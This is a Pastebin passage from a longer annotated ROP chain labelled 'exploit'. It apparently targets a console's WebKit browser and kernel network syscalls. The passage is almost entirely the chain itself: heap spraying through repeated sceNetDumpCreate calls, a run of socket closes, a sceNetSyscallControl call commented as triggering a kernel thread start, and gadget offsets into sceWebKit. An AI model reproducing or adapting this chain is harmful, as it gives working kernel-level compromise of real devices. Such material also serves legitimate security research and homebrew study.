  827.  
  828. 0x00005B78-0x00005B9C: sceNetDumpCreate(exploit + 0x00010B30,0x000CA000,0x00000000)\* r0 - lost *\
  829.  
  830. 0x00005BA0-0x00005BC4: sceNetDumpCreate(exploit + 0x00010B3C,0x000C9F00,0x00000000)\* r0 - lost *\
  831.  
  832. 0x00005BC8-0x00005BEC: sceNetDumpCreate(exploit + 0x00010B48,0x000C9E00,0x00000000)\* r0 - lost *\
  833.  
  834. 0x00005BF0-0x00005C14: sceNetDumpCreate(exploit + 0x00010B54,0x000C9D00,0x00000000)\* r0 - lost *\
  835.  
  836. 0x00005C18-0x00005C3C: sceNetDumpCreate(exploit + 0x00010B60,0x000C9C00,0x00000000)\* r0 - lost *\
  837.  
  838. 0x00005C40-0x00005C64: sceNetDumpCreate(exploit + 0x00010B6C,0x000C9B00,0x00000000)\* r0 - lost *\
  839.  
  840. 0x00005C68-0x00005C8C: sceNetDumpCreate(exploit + 0x00010B78,0x000C9A00,0x00000000)\* r0 - lost *\
  841.  
  842. 0x00005C90-0x00005CB4: sceNetDumpCreate(exploit + 0x00010B84,0x000C9900,0x00000000)\* r0 - lost *\
  843.  
  844. 0x00005CB8-0x00005CDC: sceNetDumpCreate(exploit + 0x00010B90,0x000C9800,0x00000000)\* r0 - lost *\
  845.  
  846. 0x00005CE0-0x00005D04: sceNetDumpCreate(exploit + 0x00010B9C,0x000C9700,0x00000000)\* r0 - lost *\
  847.  
  848. 0x00005D08-0x00005D2C: sceNetDumpCreate(exploit + 0x00010BA8,0x000C9600,0x00000000)\* r0 - lost *\
  849.  
  850. 0x00005D30-0x00005D54: sceNetDumpCreate(exploit + 0x00010BB4,0x000C9500,0x00000000)\* r0 - lost *\
  851.  
  852. 0x00005D58-0x00005D7C: sceNetDumpCreate(exploit + 0x00010BC0,0x000C9400,0x00000000)\* r0 - lost *\
  853.  
  854. 0x00005D80-0x00005DA4: sceNetDumpCreate(exploit + 0x00010BCC,0x000C9300,0x00000000)\* r0 - lost *\
  855.  
  856. 0x00005DA8-0x00005DCC: sceNetDumpCreate(exploit + 0x00010BD8,0x000C9200,0x00000000)\* r0 - lost *\
  857.  
  858. 0x00005DD0-0x00005DF4: sceNetDumpCreate(exploit + 0x00010BE4,0x000C9100,0x00000000)\* r0 - lost *\
  859.  
  860. 0x00005DF8-0x00005E1C: sceNetDumpCreate(exploit + 0x00010BF0,0x000C9000,0x00000000)\* r0 - lost *\
  861.  
  862. 0x00005E20-0x00005E44: sceNetDumpCreate(exploit + 0x00010BFC,0x000C8F00,0x00000000)\* r0 - lost *\
  863.  
  864. 0x00005E48-0x00005E6C: sceNetDumpCreate(exploit + 0x00010C08,0x000C8E00,0x00000000)\* r0 - lost *\
  865.  
  866. 0x00005E70-0x00005E94: sceNetDumpCreate(exploit + 0x00010C14,0x000C8D00,0x00000000)\* r0 - lost *\
  867.  
  868. 0x00005E98-0x00005EBC: sceNetDumpCreate(exploit + 0x00010C20,0x000C8C00,0x00000000)\* r0 - lost *\
  869.  
  870. 0x00005EC0-0x00005EE4: sceNetDumpCreate(exploit + 0x00010C2C,0x000C8B00,0x00000000)\* r0 - lost *\
  871.  
  872. 0x00005EE8-0x00005F0C: sceNetDumpCreate(exploit + 0x00010C38,0x000C8A00,0x00000000)\* r0 - lost *\
  873.  
  874. 0x00005F10-0x00005F34: sceNetDumpCreate(exploit + 0x00010C44,0x000C8900,0x00000000)\* r0 - lost *\
  875.  
  876. 0x00005F38-0x00005F5C: sceNetDumpCreate(exploit + 0x00010C50,0x000C8800,0x00000000)\* r0 - lost *\
  877.  
  878. 0x00005F60-0x00005F84: sceNetDumpCreate(exploit + 0x00010C5C,0x000C8700,0x00000000)\* r0 - lost *\
  879.  
  880. 0x00005F88-0x00005FAC: sceNetDumpCreate(exploit + 0x00010C68,0x000C8600,0x00000000)\* r0 - lost *\
  881.  
  882. 0x00005FB0-0x00005FD4: sceNetDumpCreate(exploit + 0x00010C74,0x000C8500,0x00000000)\* r0 - lost *\
  883.  
  884. 0x00005FD8-0x00005FFC: sceNetDumpCreate(exploit + 0x00010C80,0x000C8400,0x00000000)\* r0 - lost *\
  885.  
  886. 0x00006000-0x00006024: sceNetDumpCreate(exploit + 0x00010C8C,0x000C8300,0x00000000)\* r0 - lost *\
  887.  
  888. 0x00006028-0x0000604C: sceNetDumpCreate(exploit + 0x00010C98,0x000C8200,0x00000000)\* r0 - lost *\
  889.  
  890. 0x00006050-0x00006074: sceNetDumpCreate(exploit + 0x00010CA4,0x000C8100,0x00000000)\* r0 - lost *\
  891.  
  892. 0x00006078-0x0000609C: sceNetDumpCreate(exploit + 0x00010CB0,0x000C8000,0x00000000)\* r0 - lost *\
  893.  
  894. 0x000060A0-0x000060C4: sceNetDumpCreate(exploit + 0x00010CBC,0x000C7F00,0x00000000)\* r0 - lost *\
  895.  
  896. 0x000060C8-0x000060EC: sceNetDumpCreate(exploit + 0x00010CC8,0x000C7E00,0x00000000)\* r0 - lost *\
  897.  
  898. 0x000060F0-0x00006114: sceNetDumpCreate(exploit + 0x00010CD4,0x000C7D00,0x00000000)\* r0 - lost *\
  899.  
  900. 0x00006118-0x0000613C: sceNetDumpCreate(exploit + 0x00010CE0,0x000C7C00,0x00000000)\* r0 - lost *\
  901.  
  902. 0x00006140-0x00006164: sceNetDumpCreate(exploit + 0x00010CEC,0x000C7B00,0x00000000)\* r0 - lost *\
  903.  
  904. 0x00006168-0x0000618C: sceNetDumpCreate(exploit + 0x00010CF8,0x000C7A00,0x00000000)\* r0 - lost *\
  905.  
  906. 0x00006190-0x000061B4: sceNetDumpCreate(exploit + 0x00010D04,0x000C7900,0x00000000)\* r0 - lost *\
  907.  
  908. 0x000061B8-0x000061DC: sceNetDumpCreate(exploit + 0x00010D10,0x000C7800,0x00000000)\* r0 - lost *\
  909.  
  910. 0x000061E0-0x00006204: sceNetDumpCreate(exploit + 0x00010D1C,0x000C7700,0x00000000)\* r0 - lost *\
  911.  
  912. 0x00006208-0x0000622C: sceNetDumpCreate(exploit + 0x00010D28,0x000C7600,0x00000000)\* r0 - lost *\
  913.  
  914. 0x00006230-0x00006254: sceNetDumpCreate(exploit + 0x00010D34,0x000C7500,0x00000000)\* r0 - lost *\
  915.  
  916. 0x00006258-0x0000627C: sceNetDumpCreate(exploit + 0x00010D40,0x000C7400,0x00000000)\* r0 - lost *\
  917.  
  918. 0x00006280-0x000062A4: sceNetDumpCreate(exploit + 0x00010D4C,0x000C7300,0x00000000)\* r0 - lost *\
  919.  
  920. 0x000062A8-0x000062CC: sceNetDumpCreate(exploit + 0x00010D58,0x000C7200,0x00000000)\* r0 - lost *\
  921.  
  922. 0x000062D0-0x000062F4: sceNetDumpCreate(exploit + 0x00010D64,0x000C7100,0x00000000)\* r0 - lost *\
  923.  
  924. 0x000062F8-0x0000631C: sceNetDumpCreate(exploit + 0x00010D70,0x000C7000,0x00000000)\* r0 - lost *\
  925.  
  926. 0x00006320-0x00006344: sceNetDumpCreate(exploit + 0x00010D7C,0x000C6F00,0x00000000)\* r0 - lost *\
  927.  
  928. 0x00006348-0x0000636C: sceNetDumpCreate(exploit + 0x00010D88,0x000C6E00,0x00000000)\* r0 - lost *\
  929.  
  930. 0x00006370-0x00006394: sceNetDumpCreate(exploit + 0x00010D94,0x000C6D00,0x00000000)\* r0 - lost *\
  931.  
  932. 0x00006398-0x000063BC: sceNetDumpCreate(exploit + 0x00010DA0,0x000C6C00,0x00000000)\* r0 - lost *\
  933.  
  934. 0x000063C0-0x000063E4: sceNetDumpCreate(exploit + 0x00010DAC,0x000C6B00,0x00000000)\* r0 - lost *\
  935.  
  936. 0x000063E8-0x0000640C: sceNetDumpCreate(exploit + 0x00010DB8,0x000C6A00,0x00000000)\* r0 - lost *\
  937.  
  938. 0x00006410-0x00006434: sceNetDumpCreate(exploit + 0x00010DC4,0x000C6900,0x00000000)\* r0 - lost *\
  939.  
  940. 0x00006438-0x0000645C: sceNetDumpCreate(exploit + 0x00010DD0,0x000C6800,0x00000000)\* r0 - lost *\
  941.  
  942. 0x00006460-0x00006484: sceNetDumpCreate(exploit + 0x00010DDC,0x000C6700,0x00000000)\* r0 - lost *\
  943.  
  944. 0x00006488-0x000064AC: sceNetDumpCreate(exploit + 0x00010DE8,0x000C6600,0x00000000)\* r0 - lost *\
  945.  
  946. 0x000064B0-0x000064D4: sceNetDumpCreate(exploit + 0x00010DF4,0x000C6500,0x00000000)\* r0 - lost *\
  947.  
  948. 0x000064D8-0x000064FC: sceNetDumpCreate(exploit + 0x00010E00,0x000C6400,0x00000000)\* r0 - lost *\
  949.  
  950. 0x00006500-0x00006524: sceNetDumpCreate(exploit + 0x00010E0C,0x000C6300,0x00000000)\* r0 - lost *\
  951.  
  952. 0x00006528-0x0000654C: sceNetDumpCreate(exploit + 0x00010E18,0x000C6200,0x00000000)\* r0 - lost *\
  953.  
  954. 0x00006550-0x00006574: sceNetDumpCreate(exploit + 0x00010E24,0x000C6100,0x00000000)\* r0 - lost *\
  955.  
  956. 0x00006578-0x0000659C: sceNetDumpCreate(exploit + 0x00010E30,0x000C6000,0x00000000)\* r0 - lost *\
  957.  
  958. 0x000065A0-0x000065C4: sceNetDumpCreate(exploit + 0x00010E3C,0x00001000,0x00000000)\* r0 - lost *\
  959.  
  960. 0x000065C8-0x000065EC: sceNetDumpCreate(exploit + 0x00010E48,0x00001000,0x00000000)\* r0 - lost *\
  961. 0x000065F0-0x00006614: sceKernelStartThread([exploit + 0x00008620/*mhm_threadid*/], 0x1C/*arglen*/,[exploit + 0x0000881C]/*argp*/)
  962. 0x00006618-0x0000662C: sceKernelDelayThread(1500000 /* 3/2 sec*/);
  963. 0x00006630-0x0000664C: sceNetSycallClose([exploit + 0x00008470])
  964.  
  965. 0x00006650-0x0000666C: sceNetSycallClose([exploit + 0x00008478])
  966.  
  967. 0x00006670-0x0000668C: sceNetSycallClose([exploit + 0x00008480])
  968.  
  969. 0x00006690-0x000066AC: sceNetSycallClose([exploit + 0x00008488])
  970.  
  971. 0x000066B0-0x000066CC: sceNetSycallClose([exploit + 0x00008490])
  972.  
  973. 0x000066D0-0x000066EC: sceNetSycallClose([exploit + 0x00008498])
  974.  
  975. 0x000066F0-0x0000670C: sceNetSycallClose([exploit + 0x000084A0])
  976.  
  977. 0x00006710-0x0000672C: sceNetSycallClose([exploit + 0x000084A8])
  978.  
  979. 0x00006730-0x0000674C: sceNetSycallClose([exploit + 0x000084B0])
  980.  
  981. 0x00006750-0x0000676C: sceNetSycallClose([exploit + 0x000084B8])
  982.  
  983. 0x00006770-0x0000678C: sceNetSycallClose([exploit + 0x000084C0])
  984.  
  985. 0x00006790-0x000067AC: sceNetSycallClose([exploit + 0x000084C8])
  986.  
  987. 0x000067B0-0x000067CC: sceNetSycallClose([exploit + 0x000084D0])
  988.  
  989. 0x000067D0-0x000067EC: sceNetSycallClose([exploit + 0x000084D8])
  990.  
  991. 0x000067F0-0x0000680C: sceNetSycallClose([exploit + 0x000084E0])
  992.  
  993. 0x00006810-0x0000682C: sceNetSycallClose([exploit + 0x000084E8])
  994.  
  995. 0x00006830-0x0000684C: sceNetSycallClose([exploit + 0x000084F0])
  996.  
  997. 0x00006850-0x0000686C: sceNetSycallClose([exploit + 0x000084F8])
  998.  
  999. 0x00006870-0x0000688C: sceNetSycallClose([exploit + 0x00008500])
  1000.  
  1001. 0x00006890-0x000068AC: sceNetSycallClose([exploit + 0x00008508])
  1002.  
  1003. 0x000068B0-0x000068CC: sceNetSycallClose([exploit + 0x00008510])
  1004.  
  1005. 0x000068D0-0x000068EC: sceNetSycallClose([exploit + 0x00008518])
  1006.  
  1007. 0x000068F0-0x0000690C: sceNetSycallClose([exploit + 0x00008520])
  1008.  
  1009. 0x00006910-0x0000692C: sceNetSycallClose([exploit + 0x00008528])
  1010.  
  1011. 0x00006930-0x0000694C: sceNetSycallClose([exploit + 0x00008530])
  1012.  
  1013. 0x00006950-0x0000696C: sceNetSycallClose([exploit + 0x00008538])
  1014.  
  1015. 0x00006970-0x0000698C: sceNetSycallClose([exploit + 0x00008540])
  1016.  
  1017. 0x00006990-0x000069AC: sceNetSycallClose([exploit + 0x00008548])
  1018.  
  1019. 0x000069B0-0x000069CC: sceNetSycallClose([exploit + 0x00008550])
  1020.  
  1021. 0x000069D0-0x000069EC: sceNetSycallClose([exploit + 0x00008558])
  1022.  
  1023. 0x000069F0-0x00006A0C: sceNetSycallClose([exploit + 0x00008560])
  1024.  
  1025. 0x00006A10-0x00006A2C: sceNetSycallClose([exploit + 0x00008568])
  1026.  
  1027. 0x00006A30-0x00006A4C: sceNetSycallClose([exploit + 0x00008570])
  1028.  
  1029. 0x00006A50-0x00006A6C: sceNetSycallClose([exploit + 0x00008578])
  1030.  
  1031. 0x00006A70-0x00006A8C: sceNetSycallClose([exploit + 0x00008580])
  1032.  
  1033. 0x00006A90-0x00006AAC: sceNetSycallClose([exploit + 0x00008588])
  1034.  
  1035. 0x00006AB0-0x00006ACC: sceNetSycallClose([exploit + 0x00008590])
  1036.  
  1037. 0x00006AD0-0x00006AEC: sceNetSycallClose([exploit + 0x00008598])
  1038.  
  1039. 0x00006AF0-0x00006B0C: sceNetSycallClose([exploit + 0x000085A0])
  1040.  
  1041. 0x00006B10-0x00006B2C: sceNetSycallClose([exploit + 0x000085A8])
  1042.  
  1043. 0x00006B30-0x00006B4C: sceNetSycallClose([exploit + 0x000085C4])
  1044.  
  1045.  
  1046. //Trigger "sceKernelStartThread" in Kernel
  1047. 0x00006B50-0x00006B74: sceNetSyscallControl(0,0,exploit + 0x00008840/*Kernel Thread args*/,0xFC);
  1048. 0x00006B78-0x00006B94: sceNetDumpDestroy([exploit + 0x000085DC]);
  1049.  
  1050.  
  1051. 0x00006B98-0x00006BAC: sceKernelDelayThread(1000000 /*1 sec*/);
  1052. 0x00006BB0-:
  1053. R8 = [exploit + 0x00008810] + sceWebKitBase + 0x00000575
  1054. R0 = R7
  1055. R1 = R6
  1056. POP {R4,PC}
  1057. BLX R3<br>POP {R4,PC}
  1058. 0x00006C00-0x00006C14: sceNetDumpDestroy(0x00001770/*!!const!!*/)
  1059.  
  1060. 0x00006C18-0x00006C2C: sceNetDumpDestroy(0x00001771/*!!const!!*/)
  1061.  
  1062. 0x00006C30-0x00006C44: sceNetDumpDestroy(0x00001772/*!!const!!*/)
  1063.  
  1064. 0x00006C48-0x00006C5C: sceNetDumpDestroy(0x00001773/*!!const!!*/)
  1065.  
  1066. 0x00006C60-0x00006C74: sceNetDumpDestroy(0x00001774/*!!const!!*/)
  1067.  
  1068. 0x00006C78-0x00006C8C: sceNetDumpDestroy(0x00001775/*!!const!!*/)
  1069.  
  1070. 0x00006C90-0x00006CA4: sceNetDumpDestroy(0x00001776/*!!const!!*/)
  1071.  
  1072. 0x00006CA8-0x00006CBC: sceNetDumpDestroy(0x00001777/*!!const!!*/)
  1073.  
  1074. 0x00006CC0-0x00006CD4: sceNetDumpDestroy(0x00001778/*!!const!!*/)
  1075.  
  1076. 0x00006CD8-0x00006CEC: sceNetDumpDestroy(0x00001779/*!!const!!*/)
  1077.  
  1078. 0x00006CF0-0x00006D04: sceNetDumpDestroy(0x0000177A/*!!const!!*/)
  1079.  
  1080. 0x00006D08-0x00006D1C: sceNetDumpDestroy(0x0000177B/*!!const!!*/)
  1081.  
  1082. 0x00006D20-0x00006D34: sceNetDumpDestroy(0x0000177C/*!!const!!*/)
  1083.  
  1084. 0x00006D38-0x00006D4C: sceNetDumpDestroy(0x0000177D/*!!const!!*/)
  1085.  
  1086. 0x00006D50-0x00006D64: sceNetDumpDestroy(0x0000177E/*!!const!!*/)
  1087.  
  1088. 0x00006D68-0x00006D7C: sceNetDumpDestroy(0x0000177F/*!!const!!*/)
  1089.  
  1090. 0x00006D80-0x00006D94: sceNetDumpDestroy(0x00001780/*!!const!!*/)
  1091.  
  1092. 0x00006D98-0x00006DAC: sceNetDumpDestroy(0x00001781/*!!const!!*/)
  1093.  
  1094. 0x00006DB0-0x00006DC4: sceNetDumpDestroy(0x00001782/*!!const!!*/)
  1095.  
  1096. 0x00006DC8-0x00006DDC: sceNetDumpDestroy(0x00001783/*!!const!!*/)
  1097.  
  1098. 0x00006DE0-0x00006DF4: sceNetDumpDestroy(0x00001784/*!!const!!*/)
  1099.  
  1100. 0x00006DF8-0x00006E0C: sceNetDumpDestroy(0x00001785/*!!const!!*/)
  1101.  
  1102. 0x00006E10-0x00006E24: sceNetDumpDestroy(0x00001786/*!!const!!*/)
  1103.  
  1104. 0x00006E28-0x00006E3C: sceNetDumpDestroy(0x00001787/*!!const!!*/)
  1105.  
  1106. 0x00006E40-0x00006E54: sceNetDumpDestroy(0x00001788/*!!const!!*/)
  1107.  
  1108. 0x00006E58-0x00006E6C: sceNetDumpDestroy(0x00001789/*!!const!!*/)
  1109.  
  1110. 0x00006E70-0x00006E84: sceNetDumpDestroy(0x0000178A/*!!const!!*/)
  1111.  
  1112. 0x00006E88-0x00006E9C: sceNetDumpDestroy(0x0000178B/*!!const!!*/)
  1113.  
  1114. 0x00006EA0-0x00006EB4: sceNetDumpDestroy(0x0000178C/*!!const!!*/)
  1115.  
  1116. 0x00006EB8-0x00006ECC: sceNetDumpDestroy(0x0000178D/*!!const!!*/)
  1117.  
  1118. 0x00006ED0-0x00006EE4: sceNetDumpDestroy(0x0000178E/*!!const!!*/)
  1119.  
  1120. 0x00006EE8-0x00006EFC: sceNetDumpDestroy(0x0000178F/*!!const!!*/)
  1121.  
  1122. 0x00006F00-0x00006F14: sceNetDumpDestroy(0x00001790/*!!const!!*/)
  1123. 0x00006F18-ENDOFROPCHAIN: sceWebKit + 0x00000519 INFINE LOOP
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!